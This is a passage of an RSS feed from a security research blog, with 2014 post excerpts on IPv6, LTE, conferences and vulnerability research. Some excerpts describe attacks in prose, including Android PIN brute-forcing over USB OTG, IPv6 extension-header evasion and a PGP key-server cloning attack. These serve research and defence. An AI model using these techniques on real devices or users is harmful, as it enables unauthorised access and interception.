      <description>&lt;p&gt;Some weeks ago, at RIPE 68 in Warsaw, &lt;a href=&#34;http://www.steffann.nl/site/&#34;&gt;Sander Steffann&lt;/a&gt; gave a &lt;a href=&#34;https://ripe68.ripe.net/presentations/340-RIPE-554bis.pdf&#34;&gt;presentation about revising RIPE 554&lt;/a&gt; which, in his own words, “is a template guideline for procurement of stuff that should do IPv6” (&lt;a href=&#34;https://ripe68.ripe.net/archives/steno/38/&#34;&gt;here’s&lt;/a&gt; the steganography transcript of the IPv6 working group session). Some of you will probably know &lt;a href=&#34;https://www.ripe.net/ripe/docs/ripe-554&#34;&gt;RIPE 554&lt;/a&gt; as a quite helpful document for identifying reasonable real-world requirements for IPv6 capable network devices (in particular at times when vendors quite willingly put an “IPv6 ready” sticker on all their gear…).&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackInTheBox and Haxpo – 2014</title>
      <link>https://insinuator.net/2014/07/hackinthebox-and-haxpo-2014/</link>
      <pubDate>Mon, 07 Jul 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/07/hackinthebox-and-haxpo-2014/</guid>
      <description>&lt;p&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2014/06/haxpoHITB_overview_small.jpg&#34; alt=&#34;Haxpo Overview 2014&#34;&gt;&lt;/p&gt;&#xA;&lt;p&gt;Haxpo Overview 2014&lt;/p&gt;&#xA;&lt;p&gt;Past month we (which is me and a group of other ERNW students, supported by some of the “old” guys — I hope my team lead won’t yell at me for this 😉 ) attended the Haxpo and Hack in the Box in Amsterdam. Starting from 28. May, we had three days at this great conference (&lt;a href=&#34;http://www.hitb.org/&#34;&gt;HITB&lt;/a&gt;) and exposition (&lt;a href=&#34;http://haxpo.nl/&#34;&gt;Haxpo&lt;/a&gt;). The two events took place in the former building of the stock exchange in Amsterdam, called: “&lt;a href=&#34;http://www.beursvanberlage.nl/&#34;&gt;Beurs van Berlage&lt;/a&gt;”. Upon entering the building for the first time we were given details on where our booth was and where the talks would take place — setting up our booth and planning the shifts was just another thing to do before exploring the Haxpo area:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Skype GPO</title>
      <link>https://insinuator.net/2014/07/skype-gpo/</link>
      <pubDate>Thu, 03 Jul 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/07/skype-gpo/</guid>
      <description>&lt;p&gt;Hi all,&lt;/p&gt;&#xA;&lt;p&gt;regularly we get requests from customers where the idea of using Skype as a VoIP solution in their corporate environment is brought up. There are a lot of eavesdropping and more conceptual concerns (e.g. refer to &lt;a href=&#34;http://arstechnica.com/security/2014/05/encrypted-or-not-skype-communications-prove-vital-to-nsa-surveillance/&#34;&gt;this&lt;/a&gt; or &lt;a href=&#34;http://www.h-online.com/news/item/Skype-with-care-Microsoft-is-reading-everything-you-write-1862870.html&#34;&gt;this&lt;/a&gt;, and of course the legendary “&lt;a href=&#34;http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-biondi/bh-eu-06-biondi-up.pdf&#34;&gt;Silver Needle in the Skype&lt;/a&gt;” paper from Black Hat EU 2006), but those won’t be covered in this post (just to say this: at ERNW the use of Skype is strictly prohibited at by policy).&lt;/p&gt;</description>
    </item>
    <item>
      <title>New Tool: s1ap_enum</title>
      <link>https://insinuator.net/2014/06/new-tool-s1ap_enum/</link>
      <pubDate>Wed, 25 Jun 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/06/new-tool-s1ap_enum/</guid>
      <description>&lt;p&gt;As we continue our research in the 3GPP protocol world, there is a new tool for you to play with. It is called &lt;strong&gt;s1ap_enum&lt;/strong&gt; and thats also what it does  😉&lt;/p&gt;&#xA;&lt;p&gt;The tool itself is written in erlang, as i found no other free ASN.1 parser that is able to parse those fancy 3GPP protocol specs. It connects to an MME on sctp/36412 and tries to initiate a S1AP session by sending an S1SetupRequest PDU. To establish a S1AP session with an MME the right MCC and MNC are needed in the PLMNIdentity. The tool tries to guess the right MCC/MNC combinations. It comes with a preset of known MCC/MNC pairs from &lt;a href=&#34;http://www.mcc-mnc.com/&#34;&gt;mcc-mnc.com&lt;/a&gt;, but can try all other combinations as well.&lt;/p&gt;</description>
    </item>
    <item>
      <title>m0n0wall as an IPv6 firewall</title>
      <link>https://insinuator.net/2014/05/m0n0wall-as-an-ipv6-firewall/</link>
      <pubDate>Fri, 30 May 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/05/m0n0wall-as-an-ipv6-firewall/</guid>
      <description>&lt;p&gt;This is a guest post from &lt;a href=&#34;http://www.secfu.net&#34;&gt;Antonios Atlasis&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;Last October I had a quick look at &lt;a href=&#34;https://www.pfsense.org/&#34;&gt;pfSense 2.1&lt;/a&gt; regarding the IPv6 support that it offers. It was the first stable support of pfSense that offered the capability for IPv6 network connectivity (a few comments about it can be found &lt;a href=&#34;http://www.secfu.net/2013/10/07/ipv6-support-of-pfsense-2-1/&#34;&gt;here&lt;/a&gt;). However, I knew that &lt;a href=&#34;http://m0n0.ch/wall/&#34;&gt;m0n0wall&lt;/a&gt; supported IPv6 quite a long time ago and that their developers had incorporated the support of IPv6 features which are not available in pfSense yet, so today I decided to have a look at it too.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A Novel Way of Abusing IPv6 Extension Headers to Evade IPv6 Security Devices</title>
      <link>https://insinuator.net/2014/05/a-novel-way-of-abusing-ipv6-extension-headers-to-evade-ipv6-security-devices/</link>
      <pubDate>Mon, 26 May 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/05/a-novel-way-of-abusing-ipv6-extension-headers-to-evade-ipv6-security-devices/</guid>
      <description>&lt;p&gt;(Or How the Smallest Detail Can Make a Difference)&lt;/p&gt;&#xA;&lt;p&gt;This is a guest post from &lt;a href=&#34;http://www.secfu.net/&#34;&gt;Antonios Atlasis&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;As it is well known to the IPv6 enthusiasts, one of the most significant changes that IPv6 brings with it, apart from supporting a really huge address space, is the improved support for Extensions and Options, which is achieved by the usage of IPv6 Extension headers. According to &lt;a href=&#34;http://www.rfc-editor.org/rfc/rfc2460.txt&#34;&gt;RFC 2460&lt;/a&gt;, “&lt;em&gt;changes in the way IP header options are encoded allows for more efficient forwarding, less stringent limits on the length of options, and greater flexibility for introducing new options in the future&lt;/em&gt;.” So, by adding IPv6 Extension headers, according to the designers of the protocol, flexibility and efficiency in the IP layer is improved.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Microsoft Windows Update over IPv6 (or not?)</title>
      <link>https://insinuator.net/2014/05/microsoft-windows-update-over-ipv6-or-not/</link>
      <pubDate>Wed, 21 May 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/05/microsoft-windows-update-over-ipv6-or-not/</guid>
      <description>&lt;p&gt;Hello everyone,&lt;/p&gt;&#xA;&lt;p&gt;I recently stumbled over a &lt;a href=&#34;http://technet.microsoft.com/en-us/network/hh994905.aspx&#34;&gt;document&lt;/a&gt; from Microsoft which lists all services/applications that support IPv6. Most of the content wasn’t new for me, but one item caught my attention. &lt;em&gt;Windows Update&lt;/em&gt;. I haven’t heard before that Windows Update can be done over IPv6 (but this could just be me not looking hard enough ;)), so I was eager to test it out seeing if this is really the case. I was also curious why Microsoft referenced this &lt;a href=&#34;http://blogs.msdn.com/b/b8/archive/2012/06/05/connecting-with-ipv6-in-windows-8.aspx&#34;&gt;document&lt;/a&gt; in the respective column.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Django Image Validation Vulnerability</title>
      <link>https://insinuator.net/2014/05/django-image-validation-vulnerability/</link>
      <pubDate>Fri, 16 May 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/05/django-image-validation-vulnerability/</guid>
      <description>&lt;p&gt;Hi!&lt;/p&gt;&#xA;&lt;p&gt;In the course of a recent penetration test, we came across an Image validation vulnerability in Django when using the &lt;a href=&#34;http://www.pythonware.com/products/pil/&#34;&gt;Python-Imaging-Library (PIL)&lt;/a&gt; which we want to explain in this post.&lt;/p&gt;&#xA;&lt;p&gt;Everybody who doesn’t know what &lt;a href=&#34;https://www.djangoproject.com/&#34;&gt;Django&lt;/a&gt; and/or the PIL is:&lt;br&gt;&#xA;Django is a framework to create web applications with Python (comparable to Rails or Zend). The PIL is a powerful standard python library which provides a toolset to modify, display and verify images of many different formats.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Address Plan Considerations, Part 3: The Plan ;-)</title>
      <link>https://insinuator.net/2014/05/ipv6-address-plan-considerations-part-3-the-plan-/</link>
      <pubDate>Wed, 14 May 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/05/ipv6-address-plan-considerations-part-3-the-plan-/</guid>
      <description>&lt;p&gt;This is the third – and hence presumably last – part of the series of posts on IPv6 address planning (first part can be found &lt;a href=&#34;http://www.insinuator.net/2014/01/ipv6-address-plan-considerations-part-1-general-guidelines/&#34;&gt;here&lt;/a&gt;, second one &lt;a href=&#34;http://www.insinuator.net/2014/01/ipv6-address-plan-considerations-part-2-the-pi-space-from-singlemultiple-rirs-debate/&#34;&gt;here&lt;/a&gt;). It’s split into three main pieces. In the beginning I will lay out some general objectives to be considered when designing an address plan. Then I’ll have a look at potential hierarchy levels and finally I’ll discuss some real-life samples we’ve seen recently.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The Role of VGX.DLL in the Context of the Latest IE 0-Day</title>
      <link>https://insinuator.net/2014/05/the-role-of-vgx.dll-in-the-context-of-the-latest-ie-0-day/</link>
      <pubDate>Tue, 13 May 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/05/the-role-of-vgx.dll-in-the-context-of-the-latest-ie-0-day/</guid>
      <description>&lt;p&gt;On Saturday, April 26 Microsoft announced that Internet Explorer version 6 until version 11 is under potential risk against drive-by attacks from malicious websites, regardless of the underlying Microsoft operating system and the associated memory protection features integrated with the operating system. Microsoft has assigned CVE-2014-1776 to this unknown use-after-free vulnerability, which in the worst case could allow remote code execution if a user views a specially crafted website. If an attacker successfully exploits this vulnerability, s/he will gain the same rights and privileges as the current user (once again, activated User Account Control [UAC] helps keeping privileges of the user low).&lt;/p&gt;</description>
    </item>
    <item>
      <title>ASCII Protocol Scheme Generator</title>
      <link>https://insinuator.net/2014/05/ascii-protocol-scheme-generator/</link>
      <pubDate>Thu, 08 May 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/05/ascii-protocol-scheme-generator/</guid>
      <description>&lt;p&gt;As we historically have a strong connection to network technologies (not surprising, given the “NW” in “ERNW” stands for “Networks”), I developed a small script to create RFC-style ASCII representations of protocol schemes. The following listing shows an example created for a fictitious protocol:&lt;/p&gt;&#xA;&lt;pre&gt;&lt;code&gt; 0                   1                   2                   3  &#xA; 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1&#xA;+---------------------------------------------------------------+&#xA;|             type              |              id               |&#xA;+---------------------------------------------------------------+&#xA;|     flags     |                   reserved                    |&#xA;+---------------------------------------------------------------+&#xA;|                            payload                            |&#xA;+---------------------------------------------------------------+&#xA;&lt;/code&gt;&lt;/pre&gt;&#xA;&lt;p&gt; &lt;/p&gt;</description>
    </item>
    <item>
      <title>Bruting Android Pins</title>
      <link>https://insinuator.net/2014/05/bruting-android-pins/</link>
      <pubDate>Fri, 02 May 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/05/bruting-android-pins/</guid>
      <description>&lt;p&gt;Hi there,&lt;/p&gt;&#xA;&lt;p&gt;a few weeks ago I held a talk at &lt;a href=&#34;http://unfuck.eu/2014/&#34; title=&#34;UnFUCK&#34;&gt;UnFUC&lt;/a&gt;K, a small University con from students for students. I had decided to give a short talk on “Owning Stuff via USB” aka how to use our TR14 &lt;a href=&#34;http://www.insinuator.net/2014/03/a-troopers-keyboard/&#34; title=&#34;Badge&#34;&gt;Badge&lt;/a&gt;! During the preparations and while building my demos, I tested my new &lt;a href=&#34;http://hakshop.myshopify.com/collections/usb-rubber-ducky&#34; title=&#34;USB RubberDucky&#34;&gt;USB RubberDucky&lt;/a&gt;. One rather “trivial” demo was actually to use it as a keyboard on an Android phone.&lt;/p&gt;&#xA;&lt;p&gt;Android has been able to use the &lt;a href=&#34;http://en.wikipedia.org/wiki/USB_On-The-Go&#34; title=&#34;USB OTG&#34;&gt;USB OTG&lt;/a&gt; features for quite a while now, where most people enjoy being able to connect a USB stick to a phone, some others might have already used a keyboard on a tablet. OTG enables a USB device to play master and hence connect two USB devices to each other. For this the fifth PIN on a micro USB cable is used (it’s simply pulled down to ground). To be able to use USB OTG you both need a special cable (micro USB to female USB A) and a master device with all the necessary drivers. Depending on the Android device and the client (USB stick/HDD, keyboard) you want to connect you might need a rooted phone.When trying the RubberDucky on Android for the first time, I had a S3, a Nexus 4, a Nexus 5 and an SE Xperia Z1. All of these devices detected the Ducky as a keyboard and I was able to write stuff on the phone. But I hadn’t aimed at “just typing text”, I wanted to type numbers or rather PINs –&amp;gt; One can use the external keyboard while unlocking the device. The Ducky’s user guide contains an example script for bruteforcing PINs on Android. But how?&lt;br&gt;&#xA;Just type!&lt;/p&gt;</description>
    </item>
    <item>
      <title>Hackito Ergo Sum 2014</title>
      <link>https://insinuator.net/2014/05/hackito-ergo-sum-2014/</link>
      <pubDate>Fri, 02 May 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/05/hackito-ergo-sum-2014/</guid>
      <description>&lt;p&gt;Greetings from Heidelberg to Paris,&lt;/p&gt;&#xA;&lt;p&gt;and thanks for a great time at &lt;a href=&#34;http://2014.hackitoergosum.org/&#34;&gt;HES14&lt;/a&gt;! A nice venue (&lt;a href=&#34;http://www.cite-sciences.fr/fr/accueil/&#34;&gt;a museum&lt;/a&gt;), sweet talks and stacks of spirit carried us through the three day con. It all set off with a keynote byTROOPERs veteran Edmond ‘bigezy’ Rogers, who stuck to a quite simple principle: “People do stupid things” and I guess every single one of you has quite a few examples for that on offer. Next to every speaker referenced that statement at some point during her/his talk. Furthermore we presented an updated version of our talk &lt;a href=&#34;http://2014.hackitoergosum.org/slides/day1_ERNW_LTEvsDarwin_HES.pdf&#34;&gt;LTE vs. Darwin&lt;/a&gt;, covering our research of security in LTE networks and potential upcoming problems.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A TROOPER’s Keyboard, part2</title>
      <link>https://insinuator.net/2014/04/a-troopers-keyboard-part2/</link>
      <pubDate>Wed, 09 Apr 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/04/a-troopers-keyboard-part2/</guid>
      <description>&lt;p&gt;Greetings fellow TROOPERs,&lt;/p&gt;&#xA;&lt;p&gt;TROOPERS14 has come to an end, and it’s finally time to let you have a go at the Badge’s source code. As promised, it was slightly modified and extended, to show you the full potential of your new gadget. I’ve added some nice payloads from Nikhil Mittal and a few own ones. Above that, for those who took their parts for soldering home, I’ve also added a few quick instructions on how to do the soldering.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A TROOPER’s Keyboard</title>
      <link>https://insinuator.net/2014/03/a-troopers-keyboard/</link>
      <pubDate>Wed, 19 Mar 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/03/a-troopers-keyboard/</guid>
      <description>&lt;p&gt;Greetings from the Print Media Academy in Heidelberg. Just in time for TROOPERS14, I’ve got the great honor to present this years badge!&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2014/03/badge.png.png&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2014/03/badge.png-1024x997.png&#34; alt=&#34;badge.png&#34;&gt;&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;Being a TROOPER is tough: You need to know loads of information, learn even more and be able to work fast.&lt;/p&gt;&#xA;&lt;p&gt;This year we decided to increase your efficiency and speed when collecting data from computer systems and, let’s say, hacking them! Your newest gadget is based on a plain &lt;a href=&#34;Arduino%20Leonardo&#34; title=&#34;http://arduino.cc/de/Main/ArduinoBoardLeonardo&#34;&gt;Arduino Leonardo&lt;/a&gt;, modded with one of our famous shields. After adding a few LEDs and buttons, it will power up to full functionality.&lt;/p&gt;</description>
    </item>
    <item>
      <title>How to Own a Router – Fritz!Box AVM Vulnerability Analysis</title>
      <link>https://insinuator.net/2014/03/how-to-own-a-router-fritzbox-avm-vulnerability-analysis/</link>
      <pubDate>Tue, 11 Mar 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/03/how-to-own-a-router-fritzbox-avm-vulnerability-analysis/</guid>
      <description>&lt;p&gt;&lt;em&gt;The below post was originally written on February 9th as a little educational exercise &amp;amp; follow-up to my &lt;a href=&#34;http://www.insinuator.net/2013/07/reverse-engineering-tools/&#34;&gt;BinDiff&lt;/a&gt; post. (This research was actually triggered by a relative asking about that strange Fritz!Box vulnerability he heard about on the radio). Once we realized the full potential of the bug we decided against publishing the post and contacted several parties instead. Amongst others this contributed to the German BSI &lt;a href=&#34;https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2014/Fritz-Box-Update_11022014.html&#34;&gt;press release&lt;/a&gt;. Given the &lt;a href=&#34;http://www.heise.de/security/meldung/Hack-gegen-AVM-Router-Fritzbox-Luecke-offengelegt-Millionen-Router-in-Gefahr-2136784.html&#34;&gt;cat is out of the bag&lt;/a&gt; now anyway, we see no reason to hold it back. We will further take this as an opportunity to lay out our basic vulnerability disclosure principles in a future post. This topic will also be discussed in the panel “Ethics of Security Work &amp;amp; Research” at &lt;a href=&#34;http://www.troopers.de&#34;&gt;Troopers&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>How to use Intel AMT and have some fun with Mainboards</title>
      <link>https://insinuator.net/2014/03/how-to-use-intel-amt-and-have-some-fun-with-mainboards/</link>
      <pubDate>Sat, 08 Mar 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/03/how-to-use-intel-amt-and-have-some-fun-with-mainboards/</guid>
      <description>&lt;p&gt;I recently got in contact with &lt;a href=&#34;http://www.intel.com/content/www/us/en/architecture-and-technology/intel-active-management-technology.html&#34; title=&#34;Intel AMT&#34;&gt;Intel AMT&lt;/a&gt; for the first time. Surely I had heard about it, knew it was “dangerous”, it was kind of exploitable and had to be deactivated. But I hadn’t actually seen it myself. Well, now I have, and I simply love it and you will probably, too (and don’t forget: love and hate are very very close to each other 😉 )&lt;br&gt;&#xA;The following blogpost will be a set of features and instructions on how to own a device with an unconfigured copy of Intel AMT without using any complicated hacks or the famous magic!&lt;/p&gt;</description>
    </item>
    <item>
      <title>The Three Billion Dollar App – Some Notes on My Upcoming Troopers Talk</title>
      <link>https://insinuator.net/2014/02/the-three-billion-dollar-app-some-notes-on-my-upcoming-troopers-talk/</link>
      <pubDate>Tue, 25 Feb 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/02/the-three-billion-dollar-app-some-notes-on-my-upcoming-troopers-talk/</guid>
      <description>&lt;p&gt;This is a guest post from Vladimir Wolstencroft from our friends of &lt;a href=&#34;http://www.aurainfosec.com/&#34;&gt;aura information security&lt;br&gt;&#xA;=&lt;/a&gt;=================================================================&lt;/p&gt;&#xA;&lt;p&gt;Mobile messaging applications have been occupying people’s attention and it seems to be all the latest news. Perhaps I should have called my presentation the 19 Billion dollar app but at the time of writing and research I thought the proposed 3 Billion dollar amount for SnapChat was a little ludicrous, who could have known that would have been just a drop in the ocean.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A Short Teaser on My New IPv6 Testing Framework</title>
      <link>https://insinuator.net/2014/02/a-short-teaser-on-my-new-ipv6-testing-framework/</link>
      <pubDate>Fri, 21 Feb 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/02/a-short-teaser-on-my-new-ipv6-testing-framework/</guid>
      <description>&lt;h1 id=&#34;this-is-a-guest-post-from-antonios-atlasis&#34;&gt;This is a guest post from Antonios Atlasis&lt;/h1&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;my name is Antonios and I am an independent IT Security Researcher from Greece. One of my latest “hobbies” is IPv6 and its potential insecurities so, please let me talk to you about my latest experience on this.&lt;/p&gt;&#xA;&lt;p&gt;This week, I had the opportunity to work together with the ERNW guys at their premises. They had built an IPv6 lab that included several commercial IPv6 security devices (firewalls, IDS/IPS and some high-end switches) and they kindly offered their lab to me to play with (thank you guys 🙂 – I always liked …expensive toys). The goal of this co-operation was two-fold: First, to test my new (not yet released) IPv6 pen-testing tool and secondly, to try to find out any IPv6-related security or operational issues on these devices (after all, they all claim that they are “IPv6-Ready”, right?).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Fresh Meat From the Coding Front</title>
      <link>https://insinuator.net/2014/02/fresh-meat-from-the-coding-front/</link>
      <pubDate>Thu, 20 Feb 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/02/fresh-meat-from-the-coding-front/</guid>
      <description>&lt;p&gt;Within the last months I had some time to work on my code and today I’m releasing some of that: a new version of dizzy as well as two new loki modules.&lt;/p&gt;&#xA;&lt;h2 id=&#34;new-version-of-dizzy&#34;&gt;New version of dizzy:&lt;/h2&gt;&#xA;&lt;p&gt;Download version 0.8.2 &lt;a href=&#34;http://c0decafe.de/tools/dizzy-0.8.2.tar.bz2&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;h3 id=&#34;usb-target-support&#34;&gt;USB target support&lt;/h3&gt;&#xA;&lt;p&gt;Dizzy is able to use neighbor travis’ &lt;a href=&#34;http://goodfet.sourceforge.net/hardware/facedancer21/&#34; title=&#34;facedancer&#34;&gt;facedancer&lt;/a&gt; to emulate a client device. Two fuzzing modes are available for USB descriptor fuzzing and USB endpoint fuzzing.&lt;/p&gt;&#xA;&lt;p&gt;Here is an example cmd to start usb configuration descriptor fuzzing:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Analyzing a CVE-2013-3346/CVE-2013-5065 Exploit with peepdf</title>
      <link>https://insinuator.net/2014/02/analyzing-a-cve-2013-3346/cve-2013-5065-exploit-with-peepdf/</link>
      <pubDate>Mon, 10 Feb 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/02/analyzing-a-cve-2013-3346/cve-2013-5065-exploit-with-peepdf/</guid>
      <description>&lt;p&gt;This is a guest post from Jose Miguel Esparza (&lt;a href=&#34;https://twitter.com/EternalTodo&#34;&gt;@EternalTodo&lt;/a&gt;)&lt;/p&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;There are already some good blog posts talking about this exploit, but I think this is a really good example to show how &lt;a href=&#34;http://peepdf.eternal-todo.com/&#34;&gt;&lt;em&gt;peepdf&lt;/em&gt;&lt;/a&gt; works and what you can learn if you attend the workshop &lt;a href=&#34;https://www.troopers.de/troopers14/troopers14-1-day-workshop-squeezing-exploit-kits-and-pdf-exploits/index.html&#34;&gt;&lt;em&gt;“Squeezing Exploit Kits and PDF Exploits”&lt;/em&gt;&lt;/a&gt; at &lt;a href=&#34;https://www.troopers.de/troopers14/index.html&#34;&gt;Troopers14&lt;/a&gt;.  The mentioned exploit was using the &lt;a href=&#34;http://www.zerodayinitiative.com/advisories/ZDI-13-212/&#34;&gt;Adobe Reader ToolButton Use-After-Free&lt;/a&gt; vulnerability to execute code in the victim’s machine and then the &lt;a href=&#34;http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5065&#34;&gt;Windows privilege escalation 0day&lt;/a&gt; to bypass the &lt;a href=&#34;http://cansecwest.com/slides/2013/Adobe%20Sandbox.pdf&#34;&gt;Adobe sandbox&lt;/a&gt; and execute a new payload without restrictions.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Preliminary Agenda for Troopers 2014 Telco Sec Day</title>
      <link>https://insinuator.net/2014/02/preliminary-agenda-for-troopers-2014-telco-sec-day/</link>
      <pubDate>Tue, 04 Feb 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/02/preliminary-agenda-for-troopers-2014-telco-sec-day/</guid>
      <description>&lt;p&gt;Given we’ve received a number of inquiries as for the agenda of this year’s TelcoSecDay here’s a first preliminary agenda. To get an idea of the event’s character you might have a look at the agenda of the &lt;a href=&#34;https://www.troopers.de/archives/troopers12/agenda12/troopers12-telcosec-day/index.html&#34;&gt;2012 edition&lt;/a&gt; or the &lt;a href=&#34;https://www.troopers.de/archives/troopers13/agenda13/troopers13-telcosec-day-2013/index.html&#34;&gt;2013 edition&lt;/a&gt;. Pls note that there might be changes/additions to the following outline as we’re currently discussing potential contributions with two European operators. Here we go, for today:&lt;/p&gt;&#xA;&lt;p&gt;9:00: Opening Remarks &amp;amp; Introduction&lt;br&gt;&#xA;9:15: Ravi Borgaonkor – Evolution of SIM Card Security&lt;br&gt;&#xA;10:15: Break&lt;br&gt;&#xA;10:45: Adrian Dabrowski&lt;br&gt;&#xA;11:45: Collin Mulliner – PatchDroid – Third Party Security Patches for Android&lt;br&gt;&#xA;12:30: Lunch&lt;br&gt;&#xA;13:45: Philippe Langlois&lt;br&gt;&#xA;14:45: Break&lt;br&gt;&#xA;15:15: Haya Shulman – The Illusion of Challenge-Response Authentication&lt;br&gt;&#xA;16:00: Christian Sielaff &amp;amp; Daniel Hauenstein – Breaking Network Monitoring Tools Used in Telco Space&lt;br&gt;&#xA;16:30: Closing Remarks&lt;br&gt;&#xA;19:00: Joint dinner (hosted by ERNW) in Heidelberg Altstadt for those interested and/or staying for the main conference&lt;/p&gt;</description>
    </item>
    <item>
      <title>Configuring IPv6 Snooping and DHCPv6 Guard on Cisco IOS</title>
      <link>https://insinuator.net/2014/01/configuring-ipv6-snooping-and-dhcpv6-guard-on-cisco-ios/</link>
      <pubDate>Thu, 30 Jan 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/01/configuring-ipv6-snooping-and-dhcpv6-guard-on-cisco-ios/</guid>
      <description>&lt;p&gt;Hi everyone,&lt;/p&gt;&#xA;&lt;p&gt;Some of you may already know (the ones who are following Enno on &lt;a href=&#34;https://twitter.com/Enno_Insinuator&#34;&gt;Twitter&lt;/a&gt;) that Enno and I had our lab day in preparation for the &lt;a href=&#34;https://www.troopers.de/troopers14/troopers14-ipv6-security-summit-2014/index.html&#34;&gt;IPv6 Security Summit&lt;/a&gt; at &lt;a href=&#34;https://www.troopers.de&#34;&gt;Troopers&lt;/a&gt;.  We had a brand new and shiny Cat4948E as our lab device to do some testing of the current generation of Cisco’s IPv6 First Hop Security (FHS) mechanisms. The Catalyst was running the latest image available (15.1(2)SG3).&lt;/p&gt;&#xA;&lt;p&gt;In this small blog post, we will take a look at the configuration and behavior of IPv6 Snooping and DHCPv6 Guard. So let’s start with IPv6 Snooping:&lt;/p&gt;</description>
    </item>
    <item>
      <title>LTE@ShmooCon, a Summary</title>
      <link>https://insinuator.net/2014/01/lte@shmoocon-a-summary/</link>
      <pubDate>Tue, 28 Jan 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/01/lte@shmoocon-a-summary/</guid>
      <description>&lt;p&gt;Hey guys,&lt;br&gt;&#xA;as some of you may have noticed, just recently at ShmooCon we gave our talk “LTE vs. Darwin” (Slides &lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2014/01/ERNW_LTEvsDarwin.pdf&#34;&gt;here&lt;/a&gt;). There we presented some results of our research in 4G telco network security. Some of those originate from our research contribution to &lt;a href=&#34;www.asmonia.de&#34;&gt;ASMONIA&lt;/a&gt;, but we expanded the scope and also took a look at the air interface. Both the air interface and the backend links &amp;amp; protocols must be secured appropriately; otherwise communication may be eavesdropped or sensitive information may be compromised. In the following we want to provide an overview of LTE main components and potential attack vectors.&lt;/p&gt;</description>
    </item>
    <item>
      <title>ShmooCon 2014</title>
      <link>https://insinuator.net/2014/01/shmoocon-2014/</link>
      <pubDate>Sun, 26 Jan 2014 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2014/01/shmoocon-2014/</guid>
      <description>&lt;p&gt;Last weekend, from 17 to 19 January, &lt;a href=&#34;http://www.shmoocon.org/&#34;&gt;ShmooCon&lt;/a&gt; was held in Washington, DC. A number of different topics was covered in great talks and we want to give you a short overview of the conference. In the following our favorite talks are briefly summarized.&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Privacy Online: What Now?&lt;/strong&gt;&lt;br&gt;&#xA;Ian Goldberg, one of the designers of the &lt;a href=&#34;http://en.wikipedia.org/wiki/Off-the-Record_Messaging&#34;&gt;OTR Protocol&lt;/a&gt;, gave the keynote on the first day. His talk was quite interesting and he presented some really nice approaches, one of those being an attack against PGP. He described the attack as follows: an attacker could copy a key server by downloading all the stored keys. If this is done it is possible to create new key pairs with exactly the same settings as the keys downloaded. The third step is to create all the signing links between the keys as they exist on the real key server. Finally, the attacker uploads these new keys including the signing links to the original key server.&lt;br&gt;&#xA;Now, in case Alice wants to retrieve the public key of Bob, Alice would find two keys with seemingly identical properties. If choosing the wrong key for encryption the message will be decipherable by the attacker and in case of MitM situation be accessed. Furthermore, if Alice then signs the “mirror key”, the cloned keys and the original would merge, resulting in further problems.&lt;br&gt;&#xA;This was just one consideration discussed in Goldberg’s talk. For the full content, watch the recording, available soon on ShmooCon page.&lt;/p&gt;</description>
    </item>
    <item>
      <title>XSS in SAP Netweaver</title>
